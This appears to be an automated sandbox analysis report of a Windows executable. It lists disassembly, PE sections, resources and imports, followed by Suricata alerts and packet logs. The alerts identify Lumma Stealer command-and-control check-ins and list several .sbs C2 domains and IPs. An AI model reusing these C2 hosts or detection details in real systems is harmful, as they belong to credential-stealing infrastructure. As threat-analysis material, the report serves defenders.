add esp, 14h
or eax, FFFFFFFFh
jmp 00007FC509172738h
mov dword ptr [ebp-14h], 00000042h
mov dword ptr [ebp-18h], esi
mov dword ptr [ebp-20h], esi
cmp edi, 3FFFFFFFh
jbe 00007FC5091726ABh
mov dword ptr [ebp-1Ch], 7FFFFFFFh
jmp 00007FC5091726A8h
lea eax, dword ptr [edi+edi]
mov dword ptr [ebp-1Ch], eax
push dword ptr [ebp+1Ch]
lea eax, dword ptr [ebp-20h]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push eax
call dword ptr [ebp+08h]
add esp, 10h
mov dword ptr [ebp+14h], eax
cmp esi, ebx
je 00007FC5091726F7h
cmp eax, ebx
jl 00007FC5091726E4h
dec dword ptr [ebp+00h]

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[C++] VS2008 build 21022
[ C ] VS2005 build 50727
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2005 build 50727
[C++] VS2008 SP1 build 30729
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe8a0c	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13d000	0x155a00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x246200	0x2628	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xde778	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc4000	0x5d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc2f53	0xc3000	a15a6949673de06fc1718b81825945c6	False	0.47380934495192306	data	6.487549296419732	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc4000	0x26970	0x26a00	824431f3e7fa3e50db851a3e674b8e12	False	0.3727181937702265	data	4.998566283762889	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xeb000	0x51088	0x6a00	4eb300d19f57f9c1d69db570a09b4a50	False	0.1915905070754717	data	4.326337990672463	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13d000	0x155a00	0x155a00	4af0b48a5172534b8cbcd7401b768c09	False	0.43668744854555436	data	6.816982796602948	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x13e2e4	0x1cbaa	PNG image data, 495 x 283, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0003909104814996
PNG	0x15ae90	0xf33	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0028270367514778
PNG	0x15bdc4	0x10c4	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0025629077353215
PNG	0x15ce88	0x10c4	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0025629077353215
PNG	0x15df4c	0xf33	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0028270367514778
PNG	0x15ee80	0xf33	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0028270367514778
PNG	0x15fdb4	0x1ea6	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.00140198827428
PNG	0x161c5c	0x10c4	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0025629077353215
PNG	0x162d20	0x10c4	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0025629077353215
PNG	0x163de4	0x10c4	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0025629077353215
PNG	0x164ea8	0x1ea8	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.001401630988787
PNG	0x166d50	0x2003	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0013422818791946
PNG	0x168d54	0xf33	PNG image data, 123 x 71, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0028270367514778
PNG	0x169c88	0x1d02	PNG image data, 91 x 45, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0014812819822245
PNG	0x16b98c	0x1ce6	PNG image data, 91 x 45, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0014868883482022
PNG	0x16d674	0x1bc4	PNG image data, 96 x 46, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0015475520540236
PNG	0x16f238	0x1cb4	PNG image data, 91 x 45, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.001497005988024
PNG	0x170eec	0x1e18	PNG image data, 91 x 45, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.0014278296988577
PNG	0x172d04	0x1bd3	PNG image data, 91 x 45, 8-bit/color RGBA, non-interlaced	Swedish	Sweden	1.001544293134915
RT_BITMAP	0x1748d8	0x4562a	Device independent bitmap graphic, 320 x 222 x 32, image size 284162, resolution 3818 x 3818 px/m	Swedish	Sweden	0.15178288681993793
RT_BITMAP	0x1b9f04	0x1c28	Device independent bitmap graphic, 112 x 16 x 32, image size 7168	Swedish	Sweden	0.5811598224195339
RT_BITMAP	0x1bbb2c	0xb28	Device independent bitmap graphic, 112 x 16 x 8, image size 1792, 256 important colors	Swedish	Sweden	0.5192577030812325
RT_BITMAP	0x1bc654	0xc28	Device independent bitmap graphic, 48 x 16 x 32, image size 3072	Swedish	Sweden	0.3589331619537275
RT_BITMAP	0x1bd27c	0x928	Device independent bitmap graphic, 48 x 16 x 24, image size 2304	Swedish	Sweden	0.3075938566552901
RT_BITMAP	0x1bdba4	0x5028	Device independent bitmap graphic, 320 x 16 x 32, image size 20480	Swedish	Sweden	0.4873294346978557
RT_BITMAP	0x1c2bcc	0x3c28	Device independent bitmap graphic, 320 x 16 x 24, image size 15360	Swedish	Sweden	0.42038961038961037
RT_BITMAP	0x1c67f4	0x3a9aa	Device independent bitmap graphic, 300 x 200 x 32, image size 240002, resolution 2834 x 2834 px/m	Swedish	Sweden	0.17459861190958248
RT_BITMAP	0x2011a0	0x14028	Device independent bitmap graphic, 640 x 32 x 32, image size 81920	Swedish	Sweden	0.3706564177647633
RT_BITMAP	0x2151c8	0xf028	Device independent bitmap graphic, 640 x 32 x 24, image size 61440	Swedish	Sweden	0.34936564736499676
RT_BITMAP	0x2241f0	0xc28	Device independent bitmap graphic, 64 x 16 x 24, image size 3072	Swedish	Sweden	0.5819408740359897
RT_BITMAP	0x224e18	0x48ea	Device independent bitmap graphic, 219 x 80 x 8, image size 17602, resolution 3818 x 3818 px/m	Swedish	Sweden	0.6069323904425158
RT_ICON	0x229704	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.16932624113475178
RT_ICON	0x229b6c	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.10359744990892532
RT_ICON	0x22ac94	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.0814686737184703
RT_ICON	0x22d2fc	0x3076	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9788005803643398
RT_MENU	0x230374	0x734	data	English	United States	0.3872017353579176
RT_MENU	0x230aa8	0x6c	data	Swedish	Sweden	0.7685185185185185
RT_MENU	0x230b14	0xae	data	Swedish	Sweden	0.7126436781609196
RT_MENU	0x230bc4	0x26	data	Swedish	Sweden	1.0526315789473684
RT_DIALOG	0x230bec	0x152	data	English	United States	0.606508875739645
RT_DIALOG	0x230d40	0x524	data	English	United States	0.3541033434650456
RT_DIALOG	0x231264	0x230	data	Swedish	Sweden	0.48214285714285715
RT_DIALOG	0x231494	0x154	data	Swedish	Sweden	0.5558823529411765
RT_DIALOG	0x2315e8	0x2e4	data	Swedish	Sweden	0.4905405405405405
RT_DIALOG	0x2318cc	0x138	data	Swedish	Sweden	0.5897435897435898
RT_DIALOG	0x231a04	0x21c	data	Swedish	Sweden	0.5574074074074075
RT_DIALOG	0x231c20	0xd4	data	English	United States	0.6792452830188679
RT_DIALOG	0x231cf4	0x420	data	English	United States	0.4119318181818182
RT_DIALOG	0x232114	0x2bc	data	English	United States	0.49
RT_DIALOG	0x2323d0	0x60	data	Swedish	Sweden	0.7708333333333334
RT_DIALOG	0x232430	0x1c0	data	English	United States	0.45982142857142855
RT_DIALOG	0x2325f0	0x2ca	data	English	United States	0.47759103641456585
RT_DIALOG	0x2328bc	0x2d8	data	English	United States	0.42445054945054944
RT_DIALOG	0x232b94	0x1c6	data	English	United States	0.5616740088105727
RT_DIALOG	0x232d5c	0x140	data	Swedish	Sweden	0.54375
RT_DIALOG	0x232e9c	0x1b4	data	Swedish	Sweden	0.5688073394495413
RT_DIALOG	0x233050	0x120	data	Swedish	Sweden	0.6319444444444444
RT_DIALOG	0x233170	0x586	data	English	United States	0.4045261669024045
RT_DIALOG	0x2336f8	0x34e	data	English	United States	0.48817966903073284
RT_DIALOG	0x233a48	0x178	data	English	United States	0.5478723404255319
RT_DIALOG	0x233bc0	0x258	data	English	United States	0.45166666666666666
RT_DIALOG	0x233e18	0x19c	data	Swedish	Sweden	0.5606796116504854
RT_DIALOG	0x233fb4	0x528	data	English	United States	0.4196969696969697
RT_DIALOG	0x2344dc	0x132	data	Swedish	Sweden	0.6045751633986928
RT_DIALOG	0x234610	0x472	data	English	United States	0.3268892794376098
RT_DIALOG	0x234a84	0x1c0	data	Swedish	Sweden	0.5200892857142857
RT_DIALOG	0x234c44	0x1d6	data	Swedish	Sweden	0.5553191489361702
RT_DIALOG	0x234e1c	0x178	data	English	United States	0.5930851063829787
RT_DIALOG	0x234f94	0x140	data	English	United States	0.571875
RT_DIALOG	0x2350d4	0xb8	data	English	United States	0.6902173913043478
RT_DIALOG	0x23518c	0x28c	data	Swedish	Sweden	0.49846625766871167
RT_DIALOG	0x235418	0x1d0	data	Swedish	Sweden	0.540948275862069
RT_DIALOG	0x2355e8	0x330	data	Swedish	Sweden	0.43137254901960786
RT_DIALOG	0x235918	0xb0	data	English	United States	0.6306818181818182
RT_DIALOG	0x2359c8	0x98	data	English	United States	0.7039473684210527
RT_DIALOG	0x235a60	0x51e	data	English	Great Britain	0.43740458015267175
RT_STRING	0x235f80	0x2e4	data	English	United States	0.32837837837837835
RT_STRING	0x236264	0x170	data	English	United States	0.483695652173913
RT_STRING	0x2363d4	0x1b0	data	English	United States	0.3773148148148148
RT_STRING	0x236584	0x2bc	data	English	United States	0.38
RT_STRING	0x236840	0x1fa	data	English	United States	0.41699604743083
RT_STRING	0x236a3c	0x11a	data	English	United States	0.524822695035461
RT_STRING	0x236b58	0x50	data	English	United States	0.625
RT_STRING	0x236ba8	0x2a	data	English	United States	0.5476190476190477
RT_STRING	0x236bd4	0x15c	data	English	United States	0.4511494252873563
RT_STRING	0x236d30	0xbe	data	English	United States	0.6210526315789474
RT_STRING	0x236df0	0xda	data	English	United States	0.43119266055045874
RT_STRING	0x236ecc	0xca	data	English	United States	0.4207920792079208
RT_STRING	0x236f98	0x1f8	data	English	United States	0.36706349206349204
RT_STRING	0x237190	0xae	data	English	United States	0.5689655172413793
RT_STRING	0x237240	0x44	data	English	United States	0.6764705882352942
RT_ACCELERATOR	0x237284	0x48	data	English	United States	0.8888888888888888
RT_GROUP_ICON	0x2372cc	0x3e	data	English	United States	0.8064516129032258
RT_VERSION	0x23730c	0x264	data	English	United States	0.46895424836601307
RT_MANIFEST	0x237570	0x36a	ASCII text, with CRLF line terminators	English	United States	0.41647597254004576

Imports

DLL	Import
WINMM.dll	mciSendCommandW, mciSendStringW
KERNEL32.dll	GlobalUnlock, GlobalLock, GlobalAlloc, InitializeCriticalSection, DeleteCriticalSection, lstrcmpiW, MultiByteToWideChar, SizeofResource, LoadResource, FindResourceW, LoadLibraryExW, GetModuleHandleW, GetLocalTime, LocalUnlock, LocalLock, MulDiv, GetVolumeInformationW, lstrcpynA, lstrlenA, GetCurrentProcessId, LockResource, GlobalSize, FileTimeToDosDateTime, FileTimeToLocalFileTime, SystemTimeToFileTime, GetTempPathW, CompareFileTime, ExpandEnvironmentStringsA, LoadLibraryA, SetFilePointer, GetFileTime, GetFileSize, GetFileAttributesW, DeleteFileW, GetTempFileNameW, RemoveDirectoryW, CreateDirectoryW, GetFileAttributesExW, GetTimeZoneInformation, GetConsoleCP, LCMapStringW, LCMapStringA, QueryPerformanceCounter, GetStartupInfoA, GetFileType, SetHandleCount, GetCommandLineW, InterlockedDecrement, FreeEnvironmentStringsW, GetModuleFileNameA, GetStdHandle, GetModuleHandleA, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, ExitProcess, HeapSize, HeapReAlloc, HeapCreate, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetSystemTimeAsFileTime, GetStartupInfoW, RtlUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, IsProcessorFeaturePresent, HeapAlloc, GetProcessHeap, HeapFree, InterlockedCompareExchange, GetStringTypeA, GetStringTypeW, InterlockedIncrement, GetLogicalDrives, GetDriveTypeW, GetTickCount, AreFileApisANSI, WideCharToMultiByte, CreateFileW, DeviceIoControl, ResetEvent, GetProcAddress, GetDiskFreeSpaceExW, CreatePipe, DuplicateHandle, GetLocaleInfoA, SetStdHandle, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, CompareStringA, CreateEventW, WriteFile, WaitForMultipleObjects, PeekNamedPipe, ReadFile, TerminateProcess, SetEvent, TerminateThread, CreateProcessW, GetLastError, DosDateTimeToFileTime, FileTimeToSystemTime, GetDateFormatW, FindFirstFileW, FindNextFileW, FindClose, lstrcmpW, GetConsoleMode, lstrcpyW, SetLastError, CreateThread, WaitForSingleObject, Sleep, CloseHandle, GetCurrentThreadId, GetCurrentProcess, FlushInstructionCache, lstrlenW, lstrcpynW, GetVersionExW, LeaveCriticalSection, EnterCriticalSection, RaiseException, LoadLibraryW, FreeLibrary, GetModuleFileNameW, lstrcatW, CompareStringW, SetEnvironmentVariableA, GetEnvironmentStringsW, InitializeCriticalSectionAndSpinCount
USER32.dll	MessageBeep, LoadStringA, PostQuitMessage, CreatePopupMenu, IsDialogMessageW, TranslateAcceleratorW, GetCapture, GetMessagePos, DrawEdge, RemoveMenu, UnregisterClassA, SetRectEmpty, SetCursor, IsMenu, GetMenuItemCount, IsClipboardFormatAvailable, GetClipboardData, CloseClipboard, wsprintfW, GetFocus, OpenClipboard, IsZoomed, IsIconic, SetMenu, GetMenu, IsWindowVisible, GetWindowThreadProcessId, ModifyMenuW, PtInRect, ReleaseCapture, SetCapture, LoadStringW, LoadAcceleratorsW, RegisterClassExW, CharNextW, LoadCursorW, GetClassInfoExW, wvsprintfW, FrameRect, ClientToScreen, GetWindowLongA, SetWindowLongA, CallWindowProcA, FindWindowExW, CheckMenuItem, EnableMenuItem, RegisterClipboardFormatW, SendDlgItemMessageW, SetWindowsHookExW, GetClassNameW, CallNextHookEx, WindowFromPoint, GetKeyState, GetWindowDC, LoadMenuW, InflateRect, OffsetRect, DrawFrameControl, DrawStateW, DestroyMenu, GetSubMenu, EndPaint, BeginPaint, RedrawWindow, GetCursorPos, TrackPopupMenuEx, SetMenuDefaultItem, CharLowerW, UnhookWindowsHookEx, RegisterWindowMessageW, IsWindowUnicode, GetMenuItemInfoW, SetMenuItemInfoW, PostMessageW, SetFocus, GetSysColor, DrawTextW, DrawFocusRect, GetSysColorBrush, FillRect, TrackMouseEvent, InvalidateRect, MoveWindow, LoadIconW, LoadBitmapW, CreateWindowExW, GetSystemMetrics, KillTimer, SetTimer, ScreenToClient, GetWindowTextLengthW, GetWindowTextW, CallWindowProcW, DestroyWindow, DefWindowProcW, InsertMenuW, IsWindowEnabled, GetSystemMenu, IsDlgButtonChecked, CheckDlgButton, GetDlgItemTextW, GetActiveWindow, EnableWindow, CreateDialogParamW, DialogBoxParamW, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, IsWindow, ShowWindow, SetWindowTextW, LoadImageW, DestroyIcon, SetWindowLongW, GetDC, GetWindow, GetWindowRect, SystemParametersInfoW, GetClientRect, MapWindowPoints, SetWindowPos, MessageBoxW, GetDlgItem, GetParent, SetDlgItemTextW, ReleaseDC, GetWindowLongW, SendMessageW, EndDialog, UpdateWindow, AppendMenuW
GDI32.dll	GetTextExtentPoint32W, ExcludeClipRect, CreateDIBSection, SetBrushOrgEx, CreateBitmap, CreatePatternBrush, PatBlt, CreateSolidBrush, ExtTextOutW, CreateCompatibleDC, CreateCompatibleBitmap, SetBkColor, SetTextColor, SelectObject, DeleteDC, GetTextMetricsW, DeleteObject, GetDeviceCaps, BitBlt, SetBkMode, GetObjectW, GetStockObject, CreateFontIndirectW
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	RegOpenKeyExA, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegSetValueExW, RegQueryInfoKeyW, RegEnumKeyExW, RegQueryValueExW, RegQueryValueExA, RegDeleteKeyW
SHELL32.dll	SHGetSpecialFolderPathW, DragQueryPoint, DragFinish, SHGetSpecialFolderLocation, DragQueryFileW, SHGetDesktopFolder, SHGetMalloc, SHGetFolderPathW, SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteW
ole32.dll	RegisterDragDrop, RevokeDragDrop, OleUninitialize, OleInitialize, CoInitialize, CoUninitialize, CoCreateInstance, CoTaskMemRealloc, ReleaseStgMedium, CoTaskMemAlloc, CoTaskMemFree, CoLockObjectExternal, DoDragDrop
OLEAUT32.dll	SysAllocString, SysFreeString, VarUI4FromStr
COMCTL32.dll	ImageList_Destroy, ImageList_ReplaceIcon, ImageList_Create, PropertySheetW, DestroyPropertySheetPage, CreatePropertySheetPageW, ImageList_AddMasked, ImageList_Add, ImageList_Draw, InitCommonControlsEx, CreateStatusWindowW, ImageList_GetImageCount
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Swedish	Sweden
English	United States
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T09:41:19.941969+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49734	188.114.97.3	443	TCP
2024-10-14T09:41:19.941969+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49734	188.114.97.3	443	TCP
2024-10-14T09:41:19.948249+0200	2056570	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)	1	192.168.2.4	63793	1.1.1.1	53	UDP
2024-10-14T09:41:20.457525+0200	2056571	ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)	1	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-14T09:41:20.905771+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-14T09:41:20.905771+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-14T09:41:20.913836+0200	2056568	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)	1	192.168.2.4	57419	1.1.1.1	53	UDP
2024-10-14T09:41:20.923976+0200	2056566	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)	1	192.168.2.4	59480	1.1.1.1	53	UDP
2024-10-14T09:41:21.465726+0200	2056567	ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)	1	192.168.2.4	49739	172.67.152.13	443	TCP
2024-10-14T09:41:21.927938+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49739	172.67.152.13	443	TCP
2024-10-14T09:41:21.927938+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	172.67.152.13	443	TCP
2024-10-14T09:41:21.935684+0200	2056564	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)	1	192.168.2.4	61189	1.1.1.1	53	UDP
2024-10-14T09:41:22.430952+0200	2056565	ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)	1	192.168.2.4	49741	172.67.205.156	443	TCP
2024-10-14T09:41:22.865609+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49741	172.67.205.156	443	TCP
2024-10-14T09:41:22.865609+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49741	172.67.205.156	443	TCP
2024-10-14T09:41:22.882835+0200	2056562	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)	1	192.168.2.4	54020	1.1.1.1	53	UDP
2024-10-14T09:41:23.419075+0200	2056563	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)	1	192.168.2.4	49743	172.67.140.193	443	TCP
2024-10-14T09:41:23.863313+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49743	172.67.140.193	443	TCP
2024-10-14T09:41:23.863313+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	172.67.140.193	443	TCP
2024-10-14T09:41:23.865115+0200	2056560	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)	1	192.168.2.4	55426	1.1.1.1	53	UDP
2024-10-14T09:41:24.361546+0200	2056561	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)	1	192.168.2.4	49745	172.67.173.224	443	TCP
2024-10-14T09:41:24.794499+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49745	172.67.173.224	443	TCP
2024-10-14T09:41:24.794499+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49745	172.67.173.224	443	TCP
2024-10-14T09:41:24.826858+0200	2056558	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)	1	192.168.2.4	63303	1.1.1.1	53	UDP
2024-10-14T09:41:25.328291+0200	2056559	ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)	1	192.168.2.4	49746	172.67.141.136	443	TCP
2024-10-14T09:41:25.755191+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49746	172.67.141.136	443	TCP
2024-10-14T09:41:25.755191+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49746	172.67.141.136	443	TCP
2024-10-14T09:41:25.756813+0200	2056556	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)	1	192.168.2.4	59559	1.1.1.1	53	UDP
2024-10-14T09:41:26.247417+0200	2056557	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)	1	192.168.2.4	49747	188.114.97.3	443	TCP
2024-10-14T09:41:26.721336+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49747	188.114.97.3	443	TCP
2024-10-14T09:41:26.721336+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49747	188.114.97.3	443	TCP
2024-10-14T09:41:28.061383+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49748	104.102.49.254	443	TCP
2024-10-14T09:41:28.784132+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49749	104.21.53.8	443	TCP
2024-10-14T09:41:28.784132+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49749	104.21.53.8	443	TCP
2024-10-14T09:41:29.769239+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49750	104.21.53.8	443	TCP
2024-10-14T09:41:29.769239+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49750	104.21.53.8	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 09:41:18.834940910 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:18.834969044 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:18.835040092 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:18.837810993 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:18.837821007 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.433150053 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.433340073 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:19.437124014 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:19.437129021 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.437514067 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.491250992 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:19.491250992 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:19.491480112 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.942049980 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.942255020 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.942394018 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:19.944299936 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:19.944309950 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.944340944 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:19.944345951 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:19.961669922 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:19.961764097 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:19.962125063 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:19.962410927 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:19.962445021 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.457432985 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.457525015 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:20.459364891 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:20.459412098 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.459815979 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.461056948 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:20.461100101 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:20.461152077 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.905783892 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.905889034 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.905944109 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:20.906080008 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:20.906119108 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.906146049 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 14, 2024 09:41:20.906161070 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 14, 2024 09:41:20.939310074 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:20.939352036 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:20.939424992 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:20.939732075 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:20.939748049 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.465435028 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.465725899 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:21.467255116 CEST	49739	443	192.168.2.4	172.67.152.13
